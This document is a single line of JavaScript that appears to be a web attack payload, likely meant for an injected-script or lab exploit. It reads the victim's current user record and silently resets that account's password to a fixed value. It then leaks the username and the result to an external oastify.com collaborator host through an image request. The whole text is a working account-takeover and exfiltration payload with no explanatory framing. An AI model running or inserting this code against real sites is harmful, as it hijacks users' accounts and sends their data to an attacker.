fetch('/api/users/current').then(r=>r.json()).then(({body:b})=>fetch('/api/users/'+b.id,{method:'PUT',body:new Blob([JSON.stringify({...b,password:'P'})],{type:'application/json'})}).then(r=>r.json()).then(d=>new Image().src='https://bydhnsub50pqlk1jkg88v0smkdq4ez2o.oastify.com/?u='+b.username+'&s='+d.code))